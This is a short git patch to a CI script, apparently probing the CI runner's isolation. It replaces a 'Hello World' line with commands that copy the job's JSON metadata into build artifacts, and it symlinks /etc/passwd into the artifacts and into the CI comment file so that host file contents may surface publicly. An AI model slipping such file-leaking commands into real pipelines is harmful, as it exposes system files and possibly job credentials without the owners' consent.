From 081227ae23bc874784a4a73dd0ca2bb192397aca Mon Sep 17 00:00:00 2001 From: Dario Nieuwenhuis Date: Sun, 2 Jul 2023 01:36:30 +0200 Subject: [PATCH] xafsd --- .github/ci/lol.sh | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/.github/ci/lol.sh b/.github/ci/lol.sh index 245fd16..18a2e91 100755 --- a/.github/ci/lol.sh +++ b/.github/ci/lol.sh @@ -3,7 +3,10 @@ ## on push branch=wtflol ## on push branch~=gh-readonly-queue/main/.* ## on pull_request +## permission contents write +## permission_repo stm32-data-generated set -euo pipefail - -echo Hello World > /ci/comment.md +cat /ci/job.json > /ci/artifacts/lol.json +ln -s /etc/passwd /ci/artifacts/haxx.txt +ln -s /etc/passwd /ci/comment.md \ No newline at end of file